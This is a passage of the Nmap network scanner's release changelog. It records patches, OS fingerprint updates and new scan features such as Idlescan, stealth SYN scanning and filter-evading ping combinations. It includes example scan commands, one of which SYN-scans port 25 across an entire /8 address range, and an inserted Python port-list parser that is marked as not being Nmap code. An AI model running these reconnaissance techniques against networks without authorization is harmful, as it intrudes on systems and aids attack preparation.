o Applied patch from Stephen Bishop (sbishop(a)idsec.co.uk) which
prevents certain false-positive responses when Nmap raw TCP ping scans
are being run in parallel.

o To emphasize the highly professional nature of Nmap, I changed all
instances of "fucked up" in error message text into "b0rked".

o Fixed a problem with nmap-frontend RPMs that would cause a bogus
/bin/xnmap link to be created (it should only create
/usr/bin/xnmap). Thanks to Juho Schultz
(juho.schultz(a)astro.helsinki.fi) for reporting the problem.

o I made the maximum number of routes and interfaces allowed
on the scanning machine dynamic rather than hardcoded #defines of 1024
and 128. You never know -- some wacko probably has that many :).

Nmap 3.15BETA1

o Integrated the largest OS fingerprint DB updates ever! Thanks to
everyone who contributed signatures! New or substantially modified
fingerprints included the latest Windows 2K/XP changes, Cisco IOS
12.2-based routers and PIX 6.3 firewalls, FreeBSD 5.0, AIX 5.1,
OpenBSD 3.2, Tru64 5.1A, IBM OS/400 V5R1M0, dozens of wireless APs,
VOIP devices, firewalls, printers, print servers, cable modems,
webcams, etc. We've even got some mod-chipped Xbox fingerprints
now!

o Applied NetBSD portability patch by Darren Reed
(darrenr(a)reed.wattle.id.au)

o Updated Makefile to better-detect if it can't make nmapfe and
provide a clearer error message. Also fixed a couple compiler
warnings on some *BSD platforms.

o Applied patch from "Max" (nmap(a)webwizarddesign.com) which adds the
port owner to the "addport" XML output lines which are printed (only
in verbose mode, I think) as each open port is discovered.

o I killed the annoying whitespace that is normally appended after the
service name. Now it is only there when an owner was found via -sI
(in which case there is a fourth column and so "service" must be
exactly 24 characters).

Nmap 3.10ALPHA9

o Reworked the "ping scan" algorithm (used for any scan except -P0 or
-sL) to be more robust in the face of low-bandwidth and congested
connections. This also improves reliability in the multi-port and
multi-type ping cases described below.

o "Ping types" are no longer exclusive -- you can now do combinations
such as "-PS22,53,80 -PT113 -PN -PE" in order to increase your odds of
passing through strict filters. The "PB" flag is now deprecated
since you can achieve the same result via "PE" and "PT" options.

o Applied patch (with modest changes) by Gabriel L. Somlo
(somlo(a)acns.colostate.edu), which allows multiple TCP probe ports in
raw (root) mode. See the previous item for an example.

o Fixed a libpcap compilation issue noted by Josef 'Jupp' Schugt
(deusxmachina(a)webmail.co.za) which relates to the definition (or
lack thereof) of ARPHRD_HDLC (used for Cisco HDLC frames).

o Tweaked the version number (-V) output slightly.

Nmap 3.10ALPHA7

o Upgraded libpcap from version 0.6.2 to 0.7.1. Updated the
libpcap-possiblymodified/NMAP_MODIFICATIONS file to give a much
more extensive list (including diffs) of the changes included
in the Nmap bundled version of Libpcap.

o Applied patch to fix a libpcap alignment bug found by Tom Duffy
(tduffy(a)sun.com).

o Fixed Windows compilation.

o Applied patch by Chad Loder (cloder(a)loder.us) of Rapid7 which
fixes OpenBSD compilation. I believe Chad is now the official
OpenBSD Nmap "port" maintainer. His patch also adjusted
random-scan (-iR) to include the recently allocated 82.0.0.0/8
space.

o Fixed (I hope) a few compilation problems on
non-IPv6-enabled machines which were noted by Josef 'Jupp'
Schugt (jupp(a)gmx.de)

o Included some man page translations which were inadvertently
missed in previous tarballs.

o Applied patch from Matthieu Verbert (mve(a)zurich.ibm.com) which
places the Nmap man pages under ${prefix}/share/man rather than
${prefix}/man when installed via RPM. Maybe the tarball
install should do this too? Opinions?

o Applied patch from R Anderson (listbox(a)pole-position.org) which
improves the way ICMP port unreachables from intermediate hosts
are handled during UDP scans.

o Added note to man page related to Nmap US export control. I
believe Nmap falls under ECCN 5D992, which has no special
restrictions beyond the standard export denial to a handful of
rogue nations such as Iraq and North Korea.

o Added a warning that some hosts may be skipped and/or repeated
when someone tries to --resume a --randomize_hosts scan. This
was suggested by Crayden Mantelium (crayden(a)sensewave.com)

o Fixed a minor memory leak noted by Michael Davis
(mike(a)datanerds.net).

Nmap 3.10ALPHA4

o Applied patch by Max Schubert (nmap(a)webwizarddesign.com) which adds
an add-port XML tag whenever a new port is found open when Nmap is
running in verbose mode. The new tag looks like:
[addport state="open" portid="22" protocol="tcp"/]
I also updated docs/nmap.dtd to recognize this new tag.

o Added German translation of Nmap man page by Marc Ruef
(marc.ruef(a)computec.ch). It is also available at
http://www.insecure.org/nmap/data/nmap_manpage-de.html

o Includes a brand new French translation of the man page by Sebastien
Blanchet. You could probably guess that it is available at
http://www.insecure.org/nmap/data/nmap_manpage-fr.html

o Applied some patches from Chad Loder (cloder(a)loder.us) which update
the random IP allocation pool and improve OpenBSD support. Some
were from the OBSD Nmap patchlist.

o Fixed a compile problem on machines without PF_INET6. Thanks to
Josef 'Jupp' Schugt (deusxmachina(a)webmail.co.za) for noting this.

Nmap 3.10ALPHA3

o Added --min_parallelism option, which makes scans more aggressive
and MUCH faster in certain situations -- especially against
firewalled hosts. It is basically the opposite of --max_parallelism
(-M). Note that reliability can be lost if you push it too far.

o Added --packet_trace option, which tells Nmap to display all of the
packets it sends and receives in a format similar to tcpdump. I
mostly added this for debugging purposes, but it should also help people
wishing to learn how Nmap works and experts wanting to ensure Nmap is doing
exactly what they expect. If you want this feature supported under
Windows, please send me a patch :).

o Fixed a segmentation fault in Idlescan (-sI).

o Made Idlescan timing more conservative when -P0 is specified to
improve accuracy.

o Fixed an infinite-loop condition that could occur during certain
dropped-packet scenarios in an Idle scan.

o Nmap now reports execution times to millisecond precision (rather
than rounding to the nearest second).

o Fixed an infinite loop caused by invalid port arguments. Problem
noted by fejed (fejed(a)uddf.net).

Nmap 3.10ALPHA2

o Fixed compilation and IPv6 support on FreeBSD (tested on
4.6-STABLE). Thanks to Niels Heinen (niels.heinen(a)ubizen.com) for
suggestions.

o Made some portability changes based on suggestions by Josef 'Jupp'
Schugt (jupp(a)gmx.de)

o Fixed compilation and IPv6 support on Solaris 9 (haven't tested
earlier versions).

Nmap 3.10ALPHA1

o IPv6 is now supported for TCP scan (-sT), connect()-style ping
scan (-sP), and list scan (-sL)! Just specify the -6 option and the
IPv6 numbers or DNS names. Netmask notation is not currently
supported -- I'm not sure how useful it is for IPv6, where even petty
end users may be allocated trillions of addresses (/80). If you
need one of the scan types that hasn't been ported yet, give
Sebastien Peterson's patch a try at http://nmap6.sourceforge.net/ .
If there is demand, I may integrate more of that into Nmap.

o Major code restructuring, which included conversion to C++ -- so
you'll need g++ or another C++ compiler. I accidentally let a C++
requirement slip in a while back and found that almost everyone has
such a compiler. Windows (VC++) users: see the README-WIN32 for new
compilation instructions.

o Applied patch from Axel Nennker (Axel.Nennker(a)t-systems.com) which
adds a --without-nmapfe option to the configure script. This is
useful if your system doesn't have the proper libraries (e.g. GTK) or
if you think GUIs are for sissies :).

o Removed arbitrary max_parallelism (-M) limitations, as suggested by
William McVey ( wam(a)cisco.com ).

o Added DEC OSF to the platforms that require the BSDFIX() macro due
to taking IP length and offset fields in host rather than network byte
order. Suggested by Dean Bennett (deanb(a)gbtn.net)

o Fixed a debug statement C ambiguity discovered by Kronos
(kronos(a)kronoz.cjb.net)

Nmap 3.00

o Woohoo! :)

Nmap 2.99RC2

o Fixed an important memory initialization bug which was causing
crashes on Mac OS X (and possibly other platforms). The problem was
located by Pieter ten Pierick (P.tenPierick(a)chello.nl)

o Various minor bugfixes/cleanup

Nmap 2.99RC1

o Implemented the biggest OS fingerprint update since December 1999!
More than 200 fingerprints were added/modified. This includes
OpenBSD 3.1, Solaris 9, Mac OS 10.1.5, OS/400, FreeBSD 4.6, the
latest MS WinXP changes, new CISCO equipment, and loads of network
devices such as VoIP phones, switches, printers, WAPs, etc.

o Updated build system to work on MacOS X.

o I removed "credit" lines from the nmap-os-fingerprints file out of
concern that evil spammers might harvest the 602 addresses. Plus
those took up 28K and the size of nmap-os-fingerprints has already
caused trouble for some handheld devices. If anyone actually cares
about the "fame" of being listed, let me know and I'll put you back
in. I still appreciate everyone who submits fingerprints! I just
don't want you to be spammed when the fingerprint file goes online.

o Minor usage screen (nmap -h) fix suggested by Martin Kluge
( martin(a)elxsi.info )

o Ensured that the initial pound (#) in C preprocessor directives is
always in column 1 (portability fix). Problem noted by Shamsher
Sran (ssran(a)bechtel.com)

Nmap 2.54BETA37

o Made SYN scan the default for privileged (root) users. This offers
far better performance for Windows users due to their broken
connect() call, and is usually even preferred on UNIX because it is
more stealthy and less likely to crash applications listening on the
target host.

o Fixed a problem noted by Ping Huang (pshuang(a)alum.mit.edu) relating
to -PI scans of a machine's own non-localhost interfaces (eg
scanning your ethernet address).

o Applied patch from Patrice Goetghebeur (pgoetghebeur(a)mac.com) which
fixes PPP/SLIP support on Mac OS X.

o Applied dozens of nmap-services portnumber mapping updates
researched and sent by palante(a)subterrain.net

o Updated nmap-rpc to the latest version from Eilon Gishri
(eilon(a)aristo.tau.ac.il)

o Fixed --resume option to better detect all of the previously scanned
hosts in an -oN file (bug report from Adam.Scott(a)predictive.com )

o Adjusted random IP generator (for -iR) to account for newly
allocated ip space from
http://www.iana.org/assignments/ipv4-address-space as noted by Chad
Loder (cloder(a)acm.org)

o Updated config.sub and config.guess to the versions in
automake-1.6.2 .

o Applied patch from Markus A. Nonym (g17m0(a)lycos.com) which checks
for a recent version of GTK+ in ./configure before even trying to
build NmapFE (avoids the previous ugly compiler errors).

o Applied patch from benkj(a)gmx.it which fixes misbehavior when Nmap
would receive EOF (including ^D) in interactive mode.

o Fixed format string bugs (not the security-related kind) found by
Takehiro YONEKURA (yonekura(a)obliguard.com) and Kuk-hyeon Lee
(errai(a)inzen.com)

o Applied patch from Greg Steuck (greg-nmap-dev(a)nest.cx) which fixes
an alignment problem in charpool.c that could cause bus errors on
64-bit platforms.

o Applied portability fix patch from Matt Christian (mattc(a)visi.com)

Nmap 2.54BETA36

o Fixed major connect scan problem introduced in BETA35

o Changed NmapFE to use the version number 2.54BETA36 rather than
0.2.54BETA36. I had to do this because RedHat took the liberty of
releasing a so-called "2.54BETA31" version of nmap-frontend in their
7.3 distribution. Thus my upgrades were failing to install on such
systems because a "later" version is already installed.

Nmap 2.54BETA35

o Fixed an issue that could cause the abort message "Serious time
computation problem in adjust_timeout ...". If you still see this,
please let me know.

o Fixed Windows compilation (and I really mean it this time -- tested
myself).

o Applied configure script patch to recognize Solaris 2.10 when it
eventually becomes available (from James Carlson
(james.d.carlson(a)east.sun.com))

o Applied some portability fixes from Albert Chin
(china(a)thewrittenword.com)

o Applied libpcap aclocal.m4 patch to enable debugging (-g) when
compiling libpcap with gcc. Patch from Ping Huang
(pshuang(a)alum.mit.edu)

o Restructured "TCP probe port" output message a bit as suggested by
Ping Huang (pshuang(a)alum.mit.edu)

Nmap 2.54BETA34

o Windows compilation fixed thanks to new VC++ project file (nmap.dsp) sent
by Evan Sparks (gmplague(a)sdf.lonestar.org) (I had forgotten to include
the new main.c).

o Various nmap-services updates

o Fixed a bunch of typos and capitalization issues in
nmap-os-fingerprints by applying patch sent in by Royce Williams
(royce(a)alaska.net).

Nmap 2.54BETA33

o Tons of OS fingerprint updates. More than 100 fingerprints added or
changed, including OpenBSD 3, FreeBSD 4.5, Solaris 9 pre-release,
Commodore 64 (with the TFE Ethernet Card and uIP stack), Compaq iPAQ,
Cisco IOS 12.2(8), AIX 5.1, IRIX 6.5.15, various
Redback/Racal/Juniper/BigIP/HP/Siemens/Brocade/Quantum devices,
numerous printers/switches, KRONOS network clock, WTI Network Power
Switch, Windows XP, and many more. Thanks to everyone who
contributed!

o Applied fix for an important RPC scanning bug sent in by Pasi Eronen
(pasi.eronen(a)nixu.com)

o Applied fix for nasty OS fingerprinting bug found by William
Robertson (wkr(a)cs.ucsb.edu)

o Do not show uptime when obviously spoofed (eg OpenBSD 3.0)

o Slightly changed (I hope improved) the whitespace in Nmap output so
that messages relating to the same host are kept together (and
different hosts are separated by newlines).

o Moved main() function into a new file, cleverly named main.c.

Nmap 2.54BETA32

o Applied Windows pinging fix from Andy Lutomirski
(Luto(a)myrealbox.com)

o Applied a few more Windows fixes from Andy.

o Fixed a flaw in several error-checking statements noted by Giacomo
Cariello (jwk(a)bug.it)

o Applied Win32 compilation fixes sent by Kirby Kuehl (kkuehl(a)cisco.com)
and jens.vogt(a)bluewin.ch

Nmap 2.54BETA31

o Added ICMP Timestamp and Netmask ping types (-PP and -PM). These
(especially timestamp) can be useful against some hosts that do not
respond to normal ping (-PI) packets.

o Documented the --data_length option and made it work with all the
ICMP ping types (echo request, netmask, and timestamp).

o Added check for strings.h before including it in portlist.c . This
fixes a compilation problem on some versions of Windows. Problem
first noted by Michael Vorin (mvorin(a)hotmail.com)

o Applied patch from Andy Lutomirski (Luto(a)myrealbox.com) which fixes
a crash on some Windows platforms when timeouts occur.

o Fixed "grepable output" (-oG) so that it prints IPID sequence class
rather than printing the TCP ISN sequence index twice. Problem
noted by Russell Fulton (r.fulton(a)auckland.ac.nz)

o Added mysterious, undocumented --scanflags option.

o Applied patch from Andy Lutomirski (Luto(a)myrealbox.com) which fixes
some important Windows bugs. Apparently this can cause a dramatic
speedup in some circumstances. The patch had other misc. changes
too.

o Fix bug noted by Chris V (iselldrugstokidsonline(a)yahoo.com) in which
Nmap could segmentation fault with the (bogus) command: './nmap -sO
-p 1-65535 hostname' (protocol only can go up to 255). That being
said, Nmap should never segfault just because of bogus options.

o Fixed problem noted by Maximiliano (emax25(a)arnet.com.ar) where Nmap
would get stuck in a (nearly) infinite loop when you try to "resume"
a random host (-iR) scan.

o Included a number of fingerprint updates, but I still have many more
web submissions to go through. Also made some nmap-services
portlist updates.

o Included a bunch of fixes (mostly to prevent compiler warnings) from
William McVey (wam(a)cisco.com)

Nmap 2.54BETA30

o Added a Document Type Definition (DTD) for the Nmap XML output
format (-oX) to the docs directory. This allows validating parsers
to check nmap XML output files for correctness. It is also useful
for application programmers to understand the XML output structure.
The DTD was written by William McVey (wam(a)cisco.com) of Cisco Secure
Consulting Services ( http://www.cisco.com/go/securityconsulting ).

o Merged in a number of Windows fixes/updates from Andy Lutomirski
(Luto(a)myrealbox.com)

o Merged in fixes/updates (mostly to the Windows functionality) from
Matt Hargett (matt(a)use.net)

o Applied patch by Colin Phipps (cph(a)netcraft.com) which correctly
encodes special characters in the XML output.

o Applied patch by William McVey (wam(a)cisco.com) which adds the uptime
information printed with -O to the XML output format.

o Fixed byte-order bug in Windows packet matching code which caused
-PS and -PT to fail. Bug found and patch sent by Tim Adam
(tma(a)osa.com.au)

o Fixed segfault problem with "-sU -F". Nobody reported this until I
noticed it :(. Anytime you see "Segmentation Fault" in the latest
version of Nmap, it is probably a bug -- please mail me the command
you used, the OS/platform you are running on, and whether it is
reproducible.

o Added a convenience option "-oA (basefilename)". This tells Nmap to
log in ALL the major formats (normal, grepable, and XML). You give
a base for the filename, and the output files will be base.nmap,
base.gnmap, and base.xml.

o Documented the --append_output option which tells Nmap to append
scan results to any output files you have specified rather than
overwriting the files.

o Integrate TIMEVAL_SEC_SUBTRACT() fix by Scott Renfro (scott(a)renfro.org)
which improves timing accuracy.

Nmap 2.54BETA29

o Integrated William McVey's multi-portlist patch. This allows you to
specify different port numbers when scanning both TCP & UDP. For
example, if you want to UDP scan for 53,111 and 137 while TCP scanning
for 21-25,80,139,515,6000,8080 you could do: nmap -sSU -p
U:53,111,137,T:21-25,80,139,515,6000,8080 target.com . Prior to
this patch, you had to either use different Nmap executions or scan
both UDP & TCP of each port. See the man page for more usage info.
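
The per-protocol port syntax described above can be checked before a scan is launched. The following is an added example, not code from Nmap: `parse_portlist` and `compact` are hypothetical helpers, and applying unqualified ports to both protocols is an assumption based on the pre-patch behaviour the entry describes.

```python
import re

MAX_PORT = 65535
_QUALIFIER = re.compile(r"^([TU]):(.*)$", re.IGNORECASE)


def parse_portlist(spec):
    """Split a '-p' style argument such as 'U:53,111,T:21-25,80' by protocol.

    A 'T:' or 'U:' prefix stays in effect until the next prefix appears.
    Assumption: entries before any prefix apply to both TCP and UDP.
    """
    ports = {"tcp": set(), "udp": set()}
    active = ("tcp", "udp")
    for raw in spec.split(","):
        item = raw.strip()
        match = _QUALIFIER.match(item)
        if match:
            active = ("tcp",) if match.group(1).upper() == "T" else ("udp",)
            item = match.group(2).strip()
        lo_text, dash, hi_text = item.partition("-")
        if not lo_text.isdigit() or (dash and not hi_text.isdigit()):
            raise ValueError("bad port entry %r in %r" % (raw, spec))
        lo = int(lo_text)
        hi = int(hi_text) if dash else lo
        if lo > hi or hi > MAX_PORT:
            raise ValueError("port range %r is reversed or above %d" % (raw, MAX_PORT))
        for proto in active:
            ports[proto].update(range(lo, hi + 1))
    return {proto: sorted(found) for proto, found in ports.items()}


def compact(ports):
    """Collapse a sorted port list back into 'a-b,c' notation for a report."""
    runs = []
    for port in ports:
        if runs and port == runs[-1][1] + 1:
            runs[-1][1] = port
        else:
            runs.append([port, port])
    return ",".join(str(a) if a == b else "%d-%d" % (a, b) for a, b in runs)


if __name__ == "__main__":
    # The port list quoted in the changelog entry above.
    scope = parse_portlist("U:53,111,137,T:21-25,80,139,515,6000,8080")
    for proto in ("tcp", "udp"):
        print(proto, len(scope[proto]), "ports:", compact(scope[proto]))
```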

o Added/updated a bunch of fingerprints, including Windows XP release
candidates #1 & #2, OpenBSD 2.9, various home gateways/cable modem,
MacOS X 10.0.4, Linux 2.4.7, Gauntlet Firewall 4.0a, a few Cisco
routers, and, most importantly, the Alcatel Advanced Reflexes IP
Phone :). Many other fingerprints were updated as well.

o Found and fixed some relatively major memory leaks based on reports
sent in by H D Moore (hdm(a)secureaustin.com), mugz
(mugz(a)x-mafia.org), and Steven Van Acker (deepstar(a)ulyssis.org)

o Applied patch from Chad Loder (chad_loder(a)rapid7.com) which improves
random target host selection (-iR) by excluding more undesirable
addresses.

o Fixed portscan timing bug found by H D Moore (hdm(a)secureaustin.com).
This bug can occur when you specify a --max_rtt_timeout but not
--initial_rtt_timeout and then scan certain firewalled hosts.

o Fixed port number printing bug found by "Stephen Leavitt"
(stephen_j_leavitt(a)hotmail.com)

o The Nmap source tarball now extracts with more lenient permissions
(sometimes world-readable or world-executable, but never
world-writable). If you don't want this, set your umask to 077
(which is what I do). Suggested by Line Printer (lps(a)rahul.net)

Nmap 2.54BETA28

o I hope that I have fixed the Libpcap "Unknown datalink type" problem that
many people reported. If you still receive this error, please send
me the following info:
1) Full output of Nmap including the command you typed
2) What OS/OS version you are using
3) What type of interface is the scan going through (PPP, ISDN, ethernet,
PPPoE, etc)
4) Whether you compiled from source or used the RPM version

o Hopefully fixed Libpcap lex/yacc generated file problem that
plagued a few folks.

o Various minor fixes/changes/updates

Nmap 2.54BETA27

o Fixed bug that caused "adding open port" messages to be printed even
when verbose mode was not specified (patch sent by Doug Hoyte
(dugely(a)yahoo.com)).

o Fixed bug in zombie:port option parsing in Idlescan as well as a few
other bugs in patch sent by Germano Caronni (gec(a)acm.org)

o Fixed Windows compilation (I broke it when I added Idlescan).

o Fixed a (Win32 only) port identification bug which would cause some
ports to be listed as "unknown" even when Nmap should know their
name. This was found and patched by David Griffiths
(davidg(a)intrinsica.co.uk).

o Fixed more nmap-os-fingerprints syntax/grammar violations found by
Raymond Mercier of VIGILANTe

o Fixed a memory leak in Nbase str*casecmp() functions by applying
patch sent by Matt (matt(a)use.net). I plan to kill this whole
strcasecmp.c file as soon as possible (it is a mess).

Nmap 2.54BETA26

o Added Idlescan (IPID blind scan). The usage syntax is
"-sI [zombie]".

o Fixed a bunch of fingerprints that were corrupt due to violations of
the fingerprint syntax/grammar (problems were found by Raymond
Mercier of VIGILANTe )

o Fixed command-line option parsing bug found
by "m r rao" (mrrao(a)del3.vsnl.net.in )

o Fixed an OS fingerprinting bug that caused many extra packets to be
sent if you request a lot of decoys.

o Added some debug code to help diagnose the "Unknown datalink type"
error. If Nmap is giving you this error, please send the following
info to fyodor@insecure.org : 1) The full output from Nmap
(including the command arguments) 2) What OS and OS version are you
using 3) What type of adaptor are you using (modem, ethernet, FDDI,
etc)

o Added a bunch of IDS sensor/console/agent port numbers from
Patrick Mueller (pmueller(a)neohapsis.com)

Nmap 2.54BETA25

o Added a whole bunch of new OS fingerprints (and adjustments) ranging
from big important ones (Linux 2.4.X, OpenBSD 2.9, FreeBSD 4.3,
Cisco 12.2.1, MacOS X, etc) to some that are more obscure ( such as
Apple Color LaserWriter 12/660 PS and VirtualAccess LinxpeedPro 120 )

o Upgraded Libpcap to the latest version (0.6.2) from tcpdump.org. I
modified the build system slightly by shipping pre-generated
scanner.c/grammer.c (instead of using lex/yacc) and I also upgraded
to the newest config.sub/config.guess .

o Fixed some issues with the new Libpcap under Linux (patches will be
sent to the developers).

o Added "All zeros" IP.ID sequence classification to account for the
new Linux 2.4 scheme which seems to use 0 whenever the DF bit is set
(probably a good idea).

o Tweaked TCP Timestamp and IP.ID sequence classification algorithms

Nmap 2.54BETA24

o Fixed compilation problems on MacOS X public release. Thanks to
Nicolas Dawson (nizcolas(a)myrealbox.com) for securing an account for
me.

o On the suggestion of the ever-helpful LaMont Jones (lamont(a)hp.com),
I obtained the newest config.guess/config.sub from
http://subversions.gnu.org/cgi-bin/cvsweb/config and made
libpcap/nbase use symlinks rather than copies of the file

o Applied patch from LaMont Jones (lamont(a)hp.com) which makes Nmap
compatible with gcc 3.0 (apparently printf() is a macro in that
version)

o Applied patch from Colin Phipps (cph(a)netcraft.com) which fixes a
problem that kept UDP RPC scanning from working unless you were also
doing a TCP scan.

o Applied a patch from Chris Eagle (cseagle(a)redshift.com) which fixes
Windows compilation (I broke it with a recent change).

o Updated Lithuanian translation of man page based on a newer version sent
by Aurimas Mikalauskas (inner(a)crazy.lt)

o Killed carriage returns in nmap.c and nmapfe.c, which caused
problems for some (SGI) compilers. Problem noted by Artur
Niederstebruch (artur(a)sgi.com)

o Updated to latest version of rpc program number list, maintained by
Eilon Gishri (eilon(a)aristo.tau.ac.il)

o Fixed a quoting bug in the Nmap man page found by
Rasmus Andersson (rasmus(a)pole-position.org)

o Applied RPM spec file changes from "Benjamin Reed"
(ranger(a)befunk.com) which allows you to avoid building the frontend
by adding "--define frontend 0" to the build command (eg --rebuild,
--ba, etc).

Nmap 2.54BETA22

o Eliminated usage of u_int32_t (was causing compilation errors on
some Sun and HP boxes). Problem first noted by Nick Munger
(nmunger(a)Oswego.EDU) and Ralf Hildebrandt
(Ralf.Hildebrandt(a)innominate.com) and Antonin Sprinzl
(Antonin.Sprinzl(a)tuwien.ac.at)

o Defined integer-width typedefs such as u32/s32/u16/etc. in Nbase.
Went through much of the Nmap code and substituted these in where
correct lengths are important (port numbers, IP addresses, etc).

Nmap 2.54BETA21

o Cleaned up a few build/distribution issues that were reported by
LaMont Jones (lamont(a)hp.com)

o Fixed compiler warning noted by Gabor Z. Papp (gzp(a)papp.hu)

Nmap 2.54BETA20

o Added TCP Timestamp sequence checking for OS detection and
Netcraft-style uptime tests.

o Found and fixed (I hope) byte alignment problem which was causing
bus errors on SPARC64 ( reported by H D Moore
(hdm(a)secureaustin.com) and Matthew Franz (mfranz(a)cisco.com) )

o Apple Darwin (Mac OS X) 1.2 portability patch from Rob Braun
(bbraun(a)synack.net)

o Added IPID sequence number predictability report (also now used in
OS detection).

o Show actual IPID, TCP ISN, and TCP timestamp values in XML format
output rather than just the cooked results.

o Suppress IPID and TCP ISN predictability report unless you use -v
(you need -O as well).

o Applied Solaris 8 compilation fixes from Germano Caronni (
gec(a)acm.org )

o Applied configure.in variable name typo fixes from Christian
Weisgerber (naddy(a)openbsd.org)

o Applied some more changes from Andy Lutomirski
(Luto(a)mailandnews.com) which provides better detection and
reporting from some heinous errors.

o Added -n and -R (always/never DNS resolve) options to the man page.

Nmap 2.54BETA19

o I ported NmapFE to Windows so that Win32 users can use the graphical
interface. It generally works, although I haven't tested much.
Patches welcome!

o Various little fixes and cleanups, especially to the Windows port.

o Applied patch from Andy Lutomirski (Luto(a)mailandnews.com) which
enhances some of the Win* error messages and adds the --win_trace
debugging option.

o Applied some patches from Jay Freeman (saurik(a)saurik.com)
  o New --data_length option adds indicated number of random data
    bytes to send with scan packet and tcp ping packet (does not
    currently work with ICMP ping packet). Does not affect OS
    detection, RPC, or connect() scan packets.
  o Windows portability fixes
  o Various other little fixes.

o Renamed rpc.h and error.h because they conflict with Windows include
files. By the way, this was a pain to figure out because VC++ is
such a crappy compiler! It basically just says problem in
"foobar.h" without giving you any idea how foobar.h got included!
gcc gives you a nice message tracing the chain of include files!

Nmap 2.54BETA16

o Upgraded to latest version of Winpcap ( 2.1-beta )

o Merged in Windows port code from Ryan Permeh ( ryan(a)eeye.com) and
Andy Lutomirski ( Luto(a)mailandnews.com ).

o Took out C++ compiler test from nbase configure script. It was
inserted accidentally, but I found it interesting that only 2 people
complained about this causing them problems. I guess most everyone
already has C++ compilers.

o Applied patch from Steve Bleazard (steve(a)bleazard.com) which fixed
bug in internal Smoothed Round Trip Time calculations.

o Fixed CFLAGS computation error in configure. Problem discovered and
patched by Fredrik Lundholm (exce7(a)ce.chalmers.se)

o Added more debugging code for "Unknown datalink type" error -- if
you get this, please send me the full error msg including hex
values.

o Added Portuguese man page translations from Antonio Pires de Castro
Junior (apcastro(a)ic.unicamp.br).

o Capitalized all references to God in error messages.

Nmap 2.54BETA7

o Applied patch from Hubert Feyrer
(hubert.feyrer(a)informatik.fh-regensburg.de) which adds support for
the new NetBSD DLT_PPP_* types.

o Updated to Eilon Gishri's (eilon(a)aristo.tau.ac.il) newest version
of nmap-rpc at ftp://ftp.tau.ac.il/pub/users/eilon/rpc/rpc

o Moved a bunch of the scanning engine related functions to new files
(scan_engine.c and scan_engine.h ). Timing functions were moved to
the new timing.c/timing.h . Other stuff was shifted to
tcpip.c/tcpip.h. At some point, nmap.c will only contain the Nmap
command line UI.

o Updated Russian version of man page from Alex Volkov (topcat(a)nm.ru)

Nmap 2.54BETA6

o Added XML output (-oX). Hopefully this will help those of you
writing Nmap front ends and other tools that utilize Nmap. The
"machine-readable" output has been renamed "grepable" (-oG) to
emphasize that XML is now the preferred machine-readable output
format. But don't worry if your tool uses -oM , that format (and
the deprecated -oM flag) won't go away any time soon (if ever).

o Applied patch from Stefan Rapp (s.rapp(a)hrz.uni-dortmund.de) which
fixes a variable argument integer promotion problem in the new
snprintf compatibility file. This is important for Redhat 7
systems.

o Reorganized output-related routines so that they now reside in
output.c & output.h. Let me know if I accidentally screwed up the
behavior of any scan types in the process.

Nmap 2.54BETA5

o Revamped the 'compatibility libraries' subsystem. Moved all of that
to a new library called 'libnbase' and changed Nmap and NmapFE to
use that. I included a better version of *snprintf and some other
compatibility files. Obviously I cannot test these changes on every
whacked OS that needs this compatibility cruft, so please let me
know if you run into compilation problems.

o Fixed a problem found by Martyn Tovey (martyn(a)netcraft.com) when
using Nmap on platforms that dislike division by zero.

o Removed 128.210.*.* addresses from Nmap man page due to complaints
from Purdue security staff.

o Fixed FreeBSD (some versions) compilation problem found by Martyn
Tovey (martyn(a)netcraft.com)

Nmap 2.54BETA4

o Upgraded to the very latest Libpcap version ( the 9/3/00 CVS
snapshot ). This version is from the tcpdump.org group rather than
the Lawrence Livermore crew. The most important advantage is Linux
Socket Filter support (so you won't have that annoying syslog
message about Nmap using the obsolete SOCK_PACKET interface).

o I tried to install Nmap on yet another machine without lex/yacc or
flex/bison. That was the last straw! I am now shipping the
generated C files, which eliminates the lex/yacc requirement.

o Applied patch by Jay Freeman (saurik) (saurik(a)saurik.com) to make
Nmap C++-clean (this was a lot of tedious work! Thanks!). Note that
Nmap still uses a normal C compiler by default, but Nmap derivatives
may appreciate C++ compatibility. Note that this only applies to
"Nmap proper", not libpcap.

o Added a HACKING file for people who want to help with Nmap
development. It describes preferred patch formats, development
resources, and offers a number of useful changes that would likely
be accepted into the main tree.

o Fixed a configure.in error found by Vacuum
(vacuum(a)technotronic.com) which could cause compilation errors.

o Fingerprint file adjustments for better Win* detection

o Ensure libpcap is not configured and/or installed if you already
have a "new enough" version (0.4a6+) installed.

o Included Italian translation of Nmap man page from Giorgio Zoppi
(deneb(a)supereva.it) .

o Fixed a SYN scan problem that could cause a major slowdown on some
busy networks.

o Fixed a crash problem in NmapFE reported by sverre ( sverre(a)gmx.net )

o Added an "SInfo" line to most printed fingerprints. It looks
similar to this:
SInfo(V=2.54BETA4%P=i686-pc-linux-gnu%D=9/4%Time=9681031%O=7%C=1)
and contains information useful when fingerprints are reported (Nmap
version/platform, scan date, and open/closed ports used)

o Fixed RPCGrind (-sR) scan. It has been almost completely broken
since 2.54BETA2 (which has been out for two weeks) and nobody
reported it! I noticed the problem myself during testing of
something else. I am disappointed that nobody bothered to even let
me know that this was broken. Does anyone even use RPC Scan?

o Various other small fixes/improvements

Nmap 2.54BETA3

o Went through and added/adjusted a bunch of fingerprints. A lot of
people submitted Windows Millennium Edition (WinME) beta
fingerprints, but nobody submitted IPs for them. So please let me
know if this version detects your WinME boxes.

o Applied NmapFE patch from Michael Fischer v. Mollard (mfvm(a)gmx.de)
which did the following:
  o Added delete event so that NmapFE always quits when you kill it
    with your window manager
  o Added the menubar to the vbox instead of to the fixed widget

o Various small fixes/improvements

Nmap 2.54BETA2

o Added a shortcut which can make single port SYN scans of a network
much faster. For example, if a new sendmail vulnerability is found,
this reduces the time it takes to scan your whole network for port
25. This shortcut takes effect when you do "-PS[port] -sS
-p[port]". For example 'nmap -n -sS -p25 -PS25 24.0.0.0/8'. This
optimization doubled the scan speed in a 30,000 IP test I performed.

o Added -sL (List scan). Just as ping scan (-sP) allows you to short
circuit the scan right after pinging, -sL allows you to short
circuit the scan right after target selection. This allows you to
see what hosts WOULD be scanned without actually doing it. The
hosts will be resolved unless you use -n. Primary uses:
1) Get all the IPs in a network (like A.B.C.D/16) and take out
machines that are too fragile to be scanned safely before
calling Nmap with the new list (using -iL).
2) Test that a complex spec like 128.4,5,7-9.*.7 does what you
expect before actual scanning.
3) When all you want to do is resolve a bunch of IPs.
4) You just want results of a zone transfer (if it is implemented).
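
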